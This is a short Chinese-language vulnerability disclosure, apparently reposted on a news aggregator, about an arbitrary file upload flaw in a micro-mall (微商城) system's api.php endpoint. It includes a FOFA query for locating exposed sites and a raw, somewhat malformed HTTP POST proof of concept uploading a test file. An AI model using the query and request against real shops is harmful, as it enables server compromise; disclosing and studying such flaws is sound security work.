当前位置: 首页 > news >正文

微商城系统api.php接口存在任意文件上传漏洞

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. 微商城系统简介

2.漏洞描述

微商城系统api.php接口存在任意文件上传漏洞

3.fofa查询语句1

body="/Mao_Public/js/jquery-2.1.1.min.js"

4.漏洞复现

漏洞链接:http://xx.xx.xx.xx/api/api.php?mod=upload&type=1

POST /api/api.php?mod=upload&type=1 HTTP/1.1
Host: xx.xx.xx.xx
User-Agent:Mozilla/4.0(compatible; MSIE 8.0;Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept:*/*
Connection: close
Content-Length: 274
Content-Type: multipart/form-data; boundary=ec3af73200618d8ba86bb2e42d4ec594--ec3af73200618d8ba86bb2e42d4ec594
Content-Disposition: form-data; name="file"; filename="271857.txt"
Content-Type: image/png792416340464
--ec3af73200618d8ba86bb2e42d4ec594
Content-Disposition: form-data; name="param"param
--ec3af73200618d8ba86bb2e42d4ec594--

 


http://www.mrgr.cn/news/13007.html

相关文章:

  • 快速学习安装使用etcd
  • 识别不到开发板串口问题(故事版)
  • 【动态规划】背包问题 - 二维费用的01背包问题
  • Docker 搭建redis集群
  • ES6 class小挑战
  • android13 隐藏状态栏里面的背光调节 隐藏下拉栏背光调节
  • 219. 存在重复元素 II【 力扣(LeetCode) 】
  • java反射机制
  • [java][代码]使用java在mongodb上传下载文件
  • 鸿蒙( Beta5版)开发实战:基于AVCodecKit【音视频解码】
  • 【已解决】Vue Duplicate keys detected: ‘[object Object]’
  • 【STM32】FMC
  • 操作符详解
  • go slices.Clone官方文档
  • 力扣(单调递增的数字)
  • AtCoder Beginner Contest 368 题ABCD详细题解(C++,Python)
  • 无法验证 Anaconda 仓库证书
  • rk3568 Android12 增加 USB HOST 模式开关
  • WPF 手撸插件 七 日志记录(二)
  • 协同过滤推荐算法:个性化推荐的基石